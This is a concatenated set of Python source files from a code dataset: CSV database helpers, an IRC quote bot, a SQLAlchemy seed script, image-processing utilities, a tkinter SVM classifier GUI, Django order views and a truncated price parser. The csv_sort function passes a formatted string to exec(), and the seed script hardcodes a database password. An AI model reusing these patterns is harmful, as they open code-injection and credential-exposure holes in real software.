command_tup:\n for x_p in command_tup:\n if x_p != OR:command_arr.append(x_p)\n for command in command_arr:\n data_get = andfilter(command,all_data,kwargs)\n for x in data_get:\n if x not in r_data['data']:r_data['data'].append(x)\n return r_data\n else:\n for x_r in andfilter(command_tup[0],all_data,kwargs):r_data['data'].append(x_r)\n return r_data\n \n def csv_write(self,data,file_path=None,**kwargs):\n if 'write' in kwargs and kwargs['write'] is False:\n csv_str = ''\n csv_str+=','.join(list(data['data'][0].keys()))\n csv_str+=''.join([f\"{','.join(map(str, x.values()))}\\n\" for x in data['data']])\n return csv_str\n else:\n with open(file_path, 'w', newline='') as file:\n writer = csvm.writer(file)\n writer.writerow(list(data['data'][0].keys()))\n writer.writerows([x.values() for x in data['data']])\n return {f\"Sucesss! 
{file_path} Is Created."}\n \n def csv_sort(self,dict_data,sort_key,**kwargs):\n kwargs,order,r_data = extract_kwargs(kwargs,self.file_path),False,{\"data\":dict_data['data'],\"status\":1}\n if \"order\" in kwargs:order = kwargs['order']\n if isinstance(sort_key,set):\n key_tup = \"i\"+str([[x] for x in sort_key])[1:-1].replace(', ',\"\")\n r_data['data'] = sorted(r_data['data'][kwargs['f_a']:kwargs['l_a']], key = lambda i:(exec('global s;s = %s' % key_tup),s),reverse=order)\n else: \n if isinstance(sort_key,str):r_data['data'][kwargs['f_a']:kwargs['l_a']] = sorted(r_data['data'],key = lambda i: i[sort_key],reverse=order)\n return r_data\n \n def csv_trash(self,command):\n data = self.csv_read()\n # iterate over a copy so removing rows does not skip entries\n for x in list(data['data']):\n if findDiff(command,x):data['data'].remove(x)\n return data\n\n def csv_update(self,data_arg=None,**kwargs):\n if \"where\" in kwargs:\n data = self.csv_read()\n for x in data['data']:\n if findDiff(kwargs['where'],x):x.update(data_arg)\n return data","repo_name":"shivjeetbhullar/pi7db","sub_path":"pi7db/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":15666,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"17806734299","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport urllib\nimport htmllib\n\nimport formatter\nimport string\nimport re\nimport random\n\nfrom ircbot import SingleServerIRCBot\nfrom irclib import nm_to_n, nm_to_h, irc_lower, ip_numstr_to_quad\n\nquote_url = \"http://www.quotationspage.com/search.php3?homesearch=\"\nquote_nfm = [\n \"ei se kaveri ole koskaan sanonut mitään järkevää\",\n \"en mä nyt kuule jaksa. Googlaa itte?\",\n \"kuka se semmonen muka on?\",\n \"koskaan kuullukkaan koko tyypistä!\",\n \"ei mun tietokannassa nyt ihan jokaista ole joka on joskus jotakin suustaan päästänyt.\",\n \"valitettavasti nyt kuule en. 
Ei nimittääin löydy.\"\n ]\n\nclass parser(htmllib.HTMLParser):\n\n def __init__(self, verbose=0):\n self.state = 0\n self.output = []\n f = formatter.NullFormatter()\n htmllib.HTMLParser.__init__(self, f, verbose)\n\n def start_dt(self,attrs):\n for i in attrs:\n if i == (\"class\",\"quote\"):\n self.state = 1;\n self.save_bgn()\n \n def end_dt(self):\n if self.state == 1:\n self.output.append(\"%s \"%self.save_end())\n self.state = 0;\n \ndef setup(self):\n self.pubcommands['quote'] = quote\n\ndef quote(self,e,c):\n\n line = e.arguments()[0]\n\n query = string.join(line.split()[1:], \"+\")\n pg = 1;\n\n # Get the first page and see if there is more\n fd = urllib.urlopen(\"%s%s&page=%d\"%(quote_url,query,pg))\n page = fd.read()\n fd.close()\n\n m = re.search('age \\d of (\\d+)',page)\n\n if m:\n pg = random.randint(1,int(m.group(1)))\n \n if pg != 1:\n fd = urllib.urlopen(\"%s%s&page=%d\"%(quote_url,query,pg))\n page = fd.read()\n fd.close()\n \n p = parser()\n p.feed(page)\n \n if len(p.output) < 1:\n nick = nm_to_n(e.source())\n c.privmsg(e.target(), \"%s, %s\"%(nick,random.choice(quote_nfm)))\n return\n \n c = self.connection\n messu = re.sub(\"\\[\\d+\\]\\s?$\",\"\",random.choice(p.output))\n # messu += \" (%s, page %d of %d)\"%(query,pg,int(m.group(1)))\n c.privmsg(e.target(), \"%s\"%messu)\n\n","repo_name":"olawi/oksanen","sub_path":"modules/quote.py","file_name":"quote.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"12712234765","text":"from sqlalchemy import create_engine\r\nfrom sqlalchemy.orm import sessionmaker\r\n\r\n\r\nfrom database_setup import Base, Category, Item, User\r\n\r\n\r\nengine = create_engine('postgresql://catalog:postgres@localhost/catalog')\r\n# Bind the engine to the metadata of the Base class so that the\r\n# declaratives can be accessed through a DBSession instance\r\nBase.metadata.bind = engine\r\n\r\n\r\nDBSession = sessionmaker(bind=engine)\r\n# A DBSession() instance establishes all conversations with the database\r\n# and represents a "staging zone" for all the objects loaded into the\r\n# database session object. Any change made against the objects in the\r\n# session won't be persisted into the database until you call\r\n# session.commit(). 
If you're not happy about the changes, you can\r\n# revert all of them back to the last commit by calling\r\n# session.rollback()\r\nsession = DBSession()\r\n\r\n\r\n# Create sample users\r\nUser0 = User(name=\"Oprah Winfrey\", email=\"oprah@oprah.com\",\r\n picture='https://upload.wikimedia.org/wikipedia/commons/6/65/Oprah_closeup.jpg')\r\nsession.add(User0)\r\nsession.commit()\r\nUser1 = User(name=\"Germaine Greer\", email=\"Germaine@Greer.com\",\r\n picture='https://upload.wikimedia.org/wikipedia/commons/a/a6/Germaine_Greer.jpg')\r\nsession.add(User1)\r\nsession.commit()\r\nUser2 = User(name=\"Heema Chopra\", email=\"heemachopra@gmail.com\",\r\n picture='https://upload.wikimedia.org/wikipedia/commons/a/ad/Indian_lady.jpg')\r\nsession.add(User2)\r\nsession.commit()\r\nUser3 = User(name=\"Ima Peruviana\", email=\"Peruviana@yahoo.com\",\r\n picture='https://upload.wikimedia.org/wikipedia/commons/9/9e/Old_zacatecas_lady.jpg')\r\nsession.add(User3)\r\nsession.commit()\r\nUser4 = User(name=\"Reema Sattarvand\", email=\"Reema@outlook.com\",\r\n picture='https://upload.wikimedia.org/wikipedia/commons/c/ca/Portrait_of_a_Persian_lady_in_Iran%2C_10-08-2006.jpg')\r\nsession.add(User4)\r\nsession.commit()\r\n\r\n\r\n# Create sample categories\r\ncategory0 = Category(user_id=1, name=\"Bushes\")\r\nsession.add(category0)\r\nsession.commit()\r\ncategory1 = Category(user_id=2, name=\"Wildflowers\")\r\nsession.add(category1)\r\nsession.commit()\r\ncategory2 = Category(user_id=3, name=\"Edible Plants\")\r\nsession.add(category2)\r\nsession.commit()\r\ncategory3 = Category(user_id=3, name=\"Striking Plants\")\r\nsession.add(category3)\r\nsession.commit()\r\ncategory4 = Category(user_id=3, name=\"Useful Plants\")\r\nsession.add(category4)\r\nsession.commit()\r\n\r\n# Create sample items\r\nnewitem0 = Item(user_id=0, name=\"Desert Peach\",\r\n description=\"Beautiful pink flowers, part of the rose family\",\r\n category=category0)\r\nsession.add(newitem0)\r\nsession.commit()\r\nnewitem1 = Item(user_id=0, name=\"Wyoming Big Sagebrush\",\r\n description=\"Fire hazard because of flammable, volatile oils\",\r\n category=category0)\r\nsession.add(newitem1)\r\nsession.commit()\r\nnewitem2 = Item(user_id=0, name=\"Snowbrush\",\r\n description=\"Burns with high intensity, fragrant flowers attract bees\",\r\n category=category0)\r\nsession.add(newitem2)\r\nsession.commit()\r\nnewitem3 = Item(user_id=1, name=\"California Poppy\",\r\n description=\"Has sedative and pain-reducing properties\",\r\n category=category1)\r\nsession.add(newitem3)\r\nsession.commit()\r\nnewitem4 = Item(user_id=1, name=\"Desert Paintbrush\",\r\n description=\"Striking red flowers\",\r\n category=category1)\r\nsession.add(newitem4)\r\nsession.commit()\r\nnewitem5 = Item(user_id=1, name=\"Desert Sunflower\",\r\n description=\"Beautiful and tough\",\r\n category=category1)\r\nsession.add(newitem5)\r\nsession.commit()\r\nnewitem6 = Item(user_id=2, name=\"Prickly Pear Cactus\",\r\n description=\"Juicy red fruits\",\r\n category=category2)\r\nsession.add(newitem6)\r\nsession.commit()\r\nnewitem7 = Item(user_id=2, name=\"Desert Gooseberry\",\r\n description=\"Thorny, Fruit can be used for pies\",\r\n category=category2)\r\nsession.add(newitem7)\r\nsession.commit()\r\nnewitem8 = Item(user_id=2, name=\"Western Serviceberry\",\r\n description=\"Edible fruit\",\r\n category=category2)\r\nsession.add(newitem8)\r\nsession.commit()\r\nnewitem9 = Item(user_id=3, name=\"Joshua Tree\",\r\n description=\"30 ft tall: Iconic, but not really a tree!\",\r\n 
category=category3)\r\nsession.add(newitem9)\r\nsession.commit()\r\nnewitem10 = Item(user_id=3, name=\"Rubber Rabbitbrush\",\r\n description=\"Bright yellow flowers, beware the pollen!\",\r\n category=category3)\r\nsession.add(newitem10)\r\nsession.commit()\r\nnewitem11 = Item(user_id=3, name=\"Spiny hopsage\",\r\n description=\"Interesting rose colored flowers\",\r\n category=category3)\r\nsession.add(newitem11)\r\nsession.commit()\r\nnewitem12 = Item(user_id=4, name=\"Yucca\",\r\n description=\"Edible flowers and useful fibers from leaves\",\r\n category=category4)\r\nsession.add(newitem12)\r\nsession.commit()\r\nnewitem13 = Item(user_id=4, name=\"Sumac\",\r\n description=\"Acidic red flowers can be made into a drink\",\r\n category=category4)\r\nsession.add(newitem13)\r\nsession.commit()\r\nnewitem14 = Item(user_id=4, name=\"Pinyon\",\r\n description=\"Where yummy pine nuts come from\",\r\n category=category4)\r\nsession.add(newitem14)\r\nsession.commit()\r\n\r\nprint(\"Added Sample Plant Content!\")\r\n","repo_name":"OmSerenity/Item-Catalog","sub_path":"catalog/generate_dbinfo.py","file_name":"generate_dbinfo.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"41514699438","text":"from tkinter import messagebox\n\nclass Name:\n def __init__(self, firstName, lastName):\n self.firstName = firstName\n self.lastName = lastName\n\ndef saveToFile(treeView):\n\n try:\n with open(\"data.txt\", \"w\") as file:\n for row in treeView.get_children():\n file.write(treeView.item(row)['values'][0] + \",\" + treeView.item(row)['values'][1] + \"\\n\")\n except Exception:\n messagebox.showinfo(\"SaveFile\", \"File couldn't be saved\")\n\n\ndef addNewName(treeView, name):\n if name.firstName == \"\" or name.lastName == \"\":\n messagebox.showinfo(\"Input\", \"The first or last name is missing!\")\n else:\n treeView.insert('', 'end', values=(name.firstName, name.lastName))\n\n\ndef readFromFile(treeView):\n try:\n file = open(\"data.txt\", \"r\")\n for row in treeView.get_children():\n treeView.delete(row)\n for row in file:\n strippedRow = row.strip('\\n')\n name = strippedRow.split(',', 1)\n treeView.insert('', 'end', values=(name[0], name[1]))\n file.close()\n except Exception:\n messagebox.showinfo(\"OpenFile\", \"File couldn't be read\")","repo_name":"csroli95/Szkript-nyelvek","sub_path":"sajatmodul.py","file_name":"sajatmodul.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7815630288","text":"from random import gauss\nimport pycocotools.mask as mask_utils\nimport numpy as np\nfrom plyfile import PlyData\nfrom PIL import Image\nfrom skimage import measure # needed by binary_mask_to_polygon below\nimport math\n\n\ndef binary_mask_to_polygon(binary_mask, tolerance=0):\n polygons = []\n # pad mask to close contours of shapes which start and end at an edge\n padded_binary_mask = np.pad(binary_mask, pad_width=1, mode='constant', constant_values=0)\n contours = measure.find_contours(padded_binary_mask, 0.5)\n contours = np.subtract(contours, 1)\n for contour in contours:\n contour = measure.approximate_polygon(contour, tolerance)\n if len(contour) <= 4:\n continue\n contour = np.flip(contour, axis=1)\n contour = np.round(np.maximum(contour, 0)).astype(np.int32)\n polygons.append(contour)\n return polygons\n\n\ndef coco_poly_to_mask(poly, h, w):\n rles = mask_utils.frPyObjects(poly, h, w)\n rle = mask_utils.merge(rles)\n mask = mask_utils.decode(rle)\n return 
mask\n\n\ndef compute_vertex(mask, kpt_2d):\n h, w = mask.shape\n m = kpt_2d.shape[0]\n xy = np.argwhere(mask == 1)[:, [1, 0]]\n\n vertex = kpt_2d[None] - xy[:, None]\n norm = np.linalg.norm(vertex, axis=2, keepdims=True)\n norm[norm < 1e-3] += 1e-3\n vertex = vertex / norm\n\n vertex_out = np.zeros([h, w, m, 2], np.float32)\n vertex_out[xy[:, 1], xy[:, 0]] = vertex\n vertex_out = np.reshape(vertex_out, [h, w, m * 2])\n\n return vertex_out\n\n# https://stackoverflow.com/questions/69024270/how-to-create-a-normal-2d-distribution-in-pytorch\ndef gaussian_2d(x=0, y=0, mx=0, my=0, sx=1, sy=1):\n return 1 / (2*math.pi*sx*sy) * \\\n np.exp(-((x - mx)**2 / (2*sx**2) + (y - my)**2 / (2*sy**2)))\n\ndef compute_vertex_distribution(mask, kpt_2d, sigma = 10):\n h, w = mask.shape\n m = kpt_2d.shape[0]\n x = np.linspace(0,w,w)\n y = np.linspace(0,h,h)\n x,y = np.meshgrid(x,y)\n distribs = np.zeros((m,h,w))\n for i,(x0, y0) in enumerate(kpt_2d):\n dist = gaussian_2d(x, y, mx = x0, my = y0, sx=sigma, sy=sigma)\n norm_factor = np.max(dist)\n dist = 1 - dist/norm_factor\n distribs[i] += dist\n return distribs\n\n\ndef get_ply_model(model_path):\n ply = PlyData.read(model_path)\n data = ply.elements[0].data\n x = data['x']\n y = data['y']\n z = data['z']\n model = np.stack([x, y, z], axis=-1)\n return model\n\n\ndef read_linemod_mask(path, ann_type, cls_idx):\n if ann_type == 'real':\n mask = np.array(Image.open(path))\n if len(mask.shape) == 3:\n return (mask[..., 0] != 0).astype(np.uint8)\n else:\n return (mask != 0).astype(np.uint8)\n elif ann_type == 'fuse':\n return (np.asarray(Image.open(path)) == cls_idx).astype(np.uint8)\n elif ann_type == 'render':\n return (np.asarray(Image.open(path))).astype(np.uint8)\n\n\ndef read_tless_mask(ann_type, path):\n if ann_type == 'real':\n return (np.asarray(Image.open(path))).astype(np.uint8)\n elif ann_type == 'render':\n depth = np.asarray(Image.open(path))\n return (depth != 65535).astype(np.uint8)\n","repo_name":"ivano-donadi/KVN","sub_path":"pvnet/lib/utils/pvnet/pvnet_data_utils.py","file_name":"pvnet_data_utils.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"1231599834","text":"import numpy as np\nfrom scipy.ndimage import convolve\nimport matplotlib.pyplot as plt\n\n\ndef sobel():\n a1 = np.matrix([1, 2, 1])\n a2 = np.matrix([-1, 0, 1])\n Kx = a1.T * a2\n Ky = a2.T * a1\n return Kx, Ky\n\n\ndef robert():\n Kx = np.array([[1, 0], [0, -1]])\n Ky = np.array([[0, 1], [-1, 0]])\n return Kx, Ky\n\n\ndef canny():\n Kx = np.array([-1, 0, 1])\n Ky = np.array([1, 0, 1])\n Kx = np.reshape(Kx, (1, 3))\n # reshape the y kernel (not Kx again) and keep it as a column vector\n Ky = np.reshape(Ky, (3, 1))\n return Kx, Ky\n\n\ndef compute_gradient(img: np.array,\n operator: str = 'sobel',\n return_xy_gradient: bool = False) -> np.array:\n '''Compute gradient.\n This function computes the gradient image (G)\n of the input image `img`\n by convolution with an operator.\n\n Parameters:\n ----------\n img: np.array\n Input image.\n operator: str\n Operator to compute the gradient (Default is Sobel operator).\n Possible values can be:\n\n - sobel\n - canny\n - robert\n\n return_xy_gradient: bool\n Allows returning Gx, Gy in addition to G\n\n Returns\n -------\n G: np.array\n Gradient image.\n G,Gx,Gy: tuple(np.array)\n If `return_xy_gradient=True`,\n returns gradient matrix in x,y direction.\n '''\n\n mapDict = {\n 'sobel': sobel,\n 'robert': robert,\n 'canny': canny\n }\n\n func = mapDict.get(operator)\n if func is None:\n raise 
ValueError(f'No operator called {operator} found.')\n Kx, Ky = func()\n # Apply the selected operator\n Gx = convolve(img, Kx)\n Gy = convolve(img, Ky)\n G = np.abs(Gx) + np.abs(Gy)\n if return_xy_gradient:\n return G, Gx, Gy\n return G\n\n\ndef distribution(img: np.array,\n operator: str = 'sobel',\n ) -> None:\n G, Gx, Gy = compute_gradient(img=img,\n operator=operator,\n return_xy_gradient=True)\n x, y = np.ravel(Gx), np.ravel(Gy)\n # use the maximum magnitudes so the symmetric axis limits are valid\n mx, my = np.max(np.abs(x)), np.max(np.abs(y))\n plt.figure()\n plt.scatter(x, y)\n plt.xlim((-2 * mx, 2 * mx))\n plt.ylim((-2 * my, 2 * my))\n plt.title('Distribution of image gradients.')\n plt.xlabel('Ix')\n plt.ylabel('Iy')\n plt.show()\n","repo_name":"LeoGim1997/Working","sub_path":"processing/gradient_filtering.py","file_name":"gradient_filtering.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"69910153855","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2017/5/21\n\n@author: Naiive\nMain function\n\"\"\"\nfrom PIL import Image as IMG\nfrom PIL import ImageTk\nimport numpy as np\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom time import time\nimport matplotlib.pyplot as plt\nfrom get_eigenvalue import *\nfrom get_svm import *\nfrom tkinter import *\nfrom tkinter import filedialog # needed by select() below\n\nroot = Tk()\nroot.title(\"Image Recognition Based on Deep Learning\")\nroot.geometry('510x280')\nmenubar = Menu(root)\n\n\n# Frame1 = Frame(root, height = 200,width = 400)\n# Frame2 = Frame(root, height = 200,width = 400)\n# Frame3 = Frame(root, height = 200,width = 400)\n# Frame1.pack()\n# Frame2.pack()\n# Frame3.pack(side = BOTTOM)\n\ntarget_n = None\nfilename = None\n\ncanvas = Canvas(root,\n width=500, # width of the Canvas widget\n height=600, # height of the Canvas widget\n bg='white') # background color of the Canvas widget\n# im = Tkinter.PhotoImage(file='img.gif') # open the image with PhotoImage\nimage = IMG.open(\"bg.jpg\")\nim = ImageTk.PhotoImage(image)\n\ncanvas.create_image(300, 50, image=im) # add the image to the Canvas widget with create_image\n# canvas.create_text(302, 77, # draw text at (302,77) with create_text\n# text='Use Canvas' # content of the drawn text\n# , fill='gray') # the drawn text is gray\n# canvas.create_text(300, 75,\n# text='Use Canvas',\n# fill='blue')\ncanvas.pack() # add the Canvas to the main window\n\n# collect data from the image database\ndef get():\n global pic, x_train, x_test, y_train, y_test, x_train1, x_test1, y_train1, y_test1\n global x_train0, x_test0, y_train0, y_test0, target_n\n global img_size\n global pca,clf\n pic = get_eigenvalue()\n print(pic.get_pca_eigen())\n print(\"------------------------------------------\")\n\n x_train, x_test, y_train, y_test = pic.get_data() # grayscale feature vectors after dimensionality reduction\n x_train1, x_test1, y_train1, y_test1 = pic.get_colordata() # color feature vectors before dimensionality reduction\n x_train0, x_test0, y_train0, y_test0 = pic.get_graydata() # grayscale feature vectors before dimensionality reduction\n img_size = pic.get_img_size() # records the h,w of each image\n target_n = pic.get_target_n() # stores the image names; the targets below hold 0,1,2... which index into this list\n pca = pic.get_pca()\n clf = SVM1(\"rbf\", [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.1], pic)\n\n\ndef plot_gallary():\n\n # pic = get_eigenvalue()\n # print(pic.get_pca_eigen())\n # print(\"------------------------------------------\")\n # x_train, x_test, y_train, y_test = pic.get_data() # grayscale feature vectors after dimensionality reduction\n # x_train1, x_test1, y_train1, y_test1 = pic.get_colordata() # color feature vectors before dimensionality reduction\n # x_train0, x_test0, y_train0, y_test0 = pic.get_graydata() # grayscale feature vectors before dimensionality reduction\n # img_size = pic.get_img_size() # records the h,w of each image\n # target_n = pic.get_target_n() # stores the image names; the targets below hold 0,1,2... which index into this list\n if target_n == None:\n print (\"Please collect the data first!\")\n return 0\n\n # predict the test images\n 
print(\"------------------------------------------\")\n print(\"正在预测图片...\")\n t0 = time()\n test_pred = clf.predict(x_test)\n print(\"完成预测,共计 %0.3f秒\" % (time() - t0))\n print(\"------------------------------------------\")\n print(\"预测结果如下:\")\n print(classification_report(y_test, test_pred, target_names=target_n))\n n_classes = pic.get_nclasses()\n print(confusion_matrix(y_test, test_pred, labels=range(n_classes)))\n print(\"------------------------------------------\")\n prediction = 0\n for i in range(len(test_pred)):\n if test_pred[i] == y_test[i]:\n prediction += 1\n precision_average = prediction / len(y_test)\n\n # test_pred存放预测结果,对应y_test\n print(\"预测的准确率为:\", precision_average)\n result = []\n for i in range(len(test_pred)):\n result.append({\"target:\": target_n[y_test[i]], \"predict:\": target_n[test_pred[i]]})\n for i in range(100):\n print(result[i])\n\n # 比较预测值和实际值\n def plot_gallery(images, titles, n_row=3, n_col=4):\n \"\"\"Helper function to plot a gallery of portraits\"\"\"\n plt.figure(figsize=(2.5 * n_col, 2.4 * n_row))\n plt.subplots_adjust(bottom=0, left=.01, right=.99, top=.90, hspace=.35, wspace=.35)\n for i in range(n_row * n_col):\n plt.subplot(n_row, n_col, i + 1)\n # plt.imshow(images[i].reshape((h, w)), cmap=plt.cm.gray)\n # image = images[i].reshape(h, w)\n # img = []\n # for j in range(len(image)):\n # img.append(list(image[j]))\n # #print(img[:5])\n plt.imshow(images[i])\n # plt.imshow(images[i])\n plt.title(titles[i], size=12)\n plt.xticks(())\n plt.yticks(())\n\n def title(y_pred, y_test, target_names, i):\n pred_name = target_names[y_pred[i]].rsplit(' ', 1)[-1]\n true_name = target_names[y_test[i]].rsplit(' ', 1)[-1]\n if y_pred[i] == y_test[i]:\n pre = \"(√)\"\n else:\n pre = '(×)'\n return 'predicted: %s%s\\ntrue: %s' % (pred_name, pre, true_name)\n\n def show_prediction():\n prediction_titles = [title(test_pred, y_test, target_n, i)\n for i in range(len(test_pred))]\n\n plot_gallery(x_test1, prediction_titles)\n\n # plot the gallery of the most significative eigenfaces\n\n # eigenface_titles = [\"eigenface %d\" % i for i in range(len(eigenfaces))]\n # plot_gallery(eigenfaces, eigenface_titles, h = 30, w = 18)\n\n plt.show()\n\n show_prediction()\n\n\ndef show_precise():\n # pic = get_eigenvalue()\n # print (pic.get_pca_eigen())\n # print(\"------------------------------------------\")\n # x_train, x_test, y_train, y_test = pic.get_data()#存放图像降维后的灰度特征向量\n # x_train1, x_test1, y_train1, y_test1 = pic.get_colordata()#存放图像降维前的彩色特征向量\n # x_train0, x_test0, y_train0, y_test0 = pic.get_graydata()#存放图像降维前的灰度特征向量\n # img_size = pic.get_img_size()#记录各图片的h,w\n # target_n = pic.get_target_n()#存放图片名字,下面函数的target存放0,1,2.。这些数字,对应这里的序号\n\n # test_pred, precision_average = SVM1(\"rbf\", [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.1], pic)\n # #test_pred存放预测结果,对应y_test\n # print (\"预测的准确率为:\", precision_average)\n # result = []\n # for i in range(len(test_pred)):\n # result.append((y_test[i], test_pred[i]))\n if target_n == None:\n print(\"请先采集数据!\")\n return 0\n #绘制预测准确度的曲线\n def show_pecise():\n kernel_to_test = ['rbf', 'poly', 'sigmoid']\n\n for kernel_name in kernel_to_test:\n x_label = np.linspace(0.0001, 1, 100)\n y_label = []\n for i in x_label:\n a, b = SVM2(kernel_name, [i], pic)\n y_label.append(b)\n plt.plot(x_label, y_label, label=kernel_name)\n\n plt.xlabel(\"Gamma\")\n plt.ylabel(\"Precision\")\n plt.title('Different Kernels Contrust')\n plt.legend()\n plt.show()\n show_pecise()\n\ndef select():\n global filename\n filename = 
filedialog.askopenfilename(filetypes = [('JPG', '.jpg'), ('PNG', '.png'), ('BMP', '.bmp')])\n print (filename)\n\n\ndef predict():\n if filename == None:\n print('Please select an image first!')\n return 0\n if target_n == None:\n print (\"Please collect the data first!\")\n return 0\n img0 = []\n im = IMG.open(filename)\n #self.pic_data_rgb.append(img.resize((50, 37)))\n #self.img_size.append(img.size)\n img = im.convert('L') # the original data is [(r,g,b)]; convert to a grayscale image [grey]\n img = img.resize((400, 200)) # resize the image to a uniform format so the array length is fixed\n img = img.getdata()\n img0.append(list(img))\n img = pca.transform(img0)\n img = np.array(img)\n prediction = clf.predict(img)\n print ('I guess you chose : ' + target_n[prediction[0]])\n # tkimg = ImageTk.PhotoImage(im) # Tk() must already be instantiated before calling this\n # l = Label(Frame3, image=tkimg)\n # l.grid(row = 3, column = 0, sticky = NW, pady = 8, padx = 20)\n # l.show()\n plt.imshow(im)\n plt.title(\"I guess this is...\" + target_n[prediction[0]] + \"?\" )\n plt.axis('off') # clear x- and y-axes\n plt.show()\n #im.show() # show everything drawn so far\n\n\n\n# b0 = Button(Frame1, text = \"Collect Database\", command = get, width=30, height=2, bd = 5)\n# b1 = Button(Frame1, text = \"Show Prediction Results\", command = plot_gallary, width=30, height=2,bd = 5)\n# b2 = Button(Frame1, text = \"Show Prediction Accuracy\", command = show_precise, width=30, height=2, bd = 5)\n# b3 = Button(Frame1, text = \"Exit Program\", command = root.quit, width=30, height=2, bd = 5)\n# b4 = Button(Frame2, text = \"Select Image\", command = select, width=30, height=2, bd = 5)\n# b5 = Button(Frame2, text = \"Predict\", command = predict, width=30, height=2, bd = 5)\n# b0.pack()\n# b1.pack()\n# b2.pack()\n# b3.pack()\n# b4.pack()\n# b5.pack()\n\nfilemenue = Menu(menubar, tearoff = False)\nfilemenue.add_command(label = \"Collect Data\", command = get)\nfilemenue.add_separator()\nfilemenue.add_command(label = \"Exit\", command = root.quit)\nmenubar.add_cascade(label = \"Start\", menu = filemenue)\n\ntestmenue = Menu(menubar, tearoff = False)\ntestmenue.add_command(label = \"Prediction Results\", command = plot_gallary)\ntestmenue.add_command(label = \"Prediction Accuracy\", command = show_precise)\nmenubar.add_cascade(label = \"Test\", menu = testmenue)\n\nchoosemenu = Menu(menubar, tearoff = False)\nchoosemenu.add_command(label = \"Select Image\", command = select)\nchoosemenu.add_command(label = \"Predict\", command = predict)\nmenubar.add_cascade(label = \"FreeRun\", menu = choosemenu)\n\n\nroot.config(menu = menubar)\n\nmainloop()","repo_name":"jumormt/PhotoClassifySVM","sub_path":"宝宝快点我.py","file_name":"宝宝快点我.py","file_ext":"py","file_size_in_byte":10179,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"79"} +{"seq_id":"7030957283","text":"from django.shortcuts import get_object_or_404, render, redirect\nfrom django.http import HttpResponse\nfrom .models import Order\nfrom .forms import OrderForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom .models import Image\nfrom django.conf import settings\nimport os\nimport logging\nimport uuid\nfrom django.core.files.uploadedfile import InMemoryUploadedFile\nimport io\nimport imghdr\nimport time\nlogger = logging.getLogger('django')\n\n\n@login_required\ndef orders_list(request):\n if request.user.is_superuser: # If the user is a superuser, show all orders\n orders = Order.objects.all()\n else:\n orders = Order.objects.filter(user=request.user) # For a regular user, show only their own orders\n context = {'orders': orders}\n return render(request, 'list_orders.html', context)\n\n\n@login_required\ndef 
order_detail(request, pk):\n order = get_object_or_404(Order, pk=pk)\n if request.user == order.user or request.user.is_superuser:\n context = {'order': order}\n return render(request, 'detail_orders.html', context)\n else:\n messages.error(request, 'You do not have permission to view this order.')\n return redirect('orders_list')\n\n\n@login_required\ndef add_order1(request):\n if request.method == 'POST':\n form = OrderForm(request.POST)\n if form.is_valid():\n form.save(user=request.user)\n return redirect('orders_list')\n else:\n form = OrderForm()\n return render(request, 'add_order.html', {'form': form})\n\n\nfrom .forms import OrderForm, ImageInlineForm\nfrom django.forms import inlineformset_factory\n\n@login_required\ndef add_order(request):\n ImageFormSet = inlineformset_factory(Order, Image, form=ImageInlineForm, extra=3, can_delete=False)\n\n if request.method == 'POST':\n order_form = OrderForm(request.POST)\n formset = ImageFormSet(request.POST, request.FILES)\n\n if order_form.is_valid() and formset.is_valid():\n order = order_form.save(commit=False)\n order.user = request.user\n order.save()\n\n for form in formset:\n if form.cleaned_data.get('image'):\n image = form.save(commit=False)\n image.order = order\n image.save()\n return redirect('orders_list')\n else:\n order_form = OrderForm()\n formset = ImageFormSet()\n\n context = {\n 'order_form': order_form,\n 'formset': formset,\n }\n\n return render(request, 'add_order.html', context)\n\n\n@login_required\ndef delete_order(request, pk):\n order = get_object_or_404(Order, pk=pk)\n if request.user == order.user or request.user.is_superuser:\n order.delete()\n messages.success(request, 'Order deleted.')\n else:\n messages.error(request, 'You do not have permission to delete this order.')\n return redirect('orders_list')\n","repo_name":"effectmaks/auto_order","sub_path":"auto/order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9092078495","text":"import csv\nimport re\nfrom numpy import mean\n\n\ndef write_csv(data):\n with open('result.csv', 'a') as file:\n writer = csv.writer(file)\n writer.writerow((data['string'], data['type'], data['price']))\n\n\ndef refined_k(s):\n print(s)\n print('k')\n # $ 450K FIXED PRICE 20 SQS HOME 4 BEDS\n pattern_k = '\\d+[kK]'\n r = re.findall(pattern_k, s)\n return r[0].lower().replace('k', '000')\n\n\ndef refined_m(s):\n print(s)\n print('m')\n pattern_m = '\\d+[mM]\\D'\n r = re.findall(pattern_m, s)\n print(r)\n r0 = r[0].replace('.', '')\n print(int(r0.lower().replace('m', '000000')))\n # , int(r[1])\n # avg = mean(a)\n # return avg\n\n\ndef refined_perc(s):\n print('perc')\n print(s)\n # $1,020,000 with 8% rental return\n pattern_k = '\\d+[%]'\n r = s.replace('.', '')\n r = r.replace(re.findall(pattern_k, r)[0], '')\n return refined_digit(r.replace(',', ''))[0]\n\n\ndef refined_aver(s):\n print('aver')\n print(s)\n pattern_k = '\\d+'\n\n r = re.findall(pattern_k, s.replace(',', ''))\n res = []\n for i in r:\n print(type(i))\n res.append(int(i))\n print(type(r[0]))\n res = mean(res) # 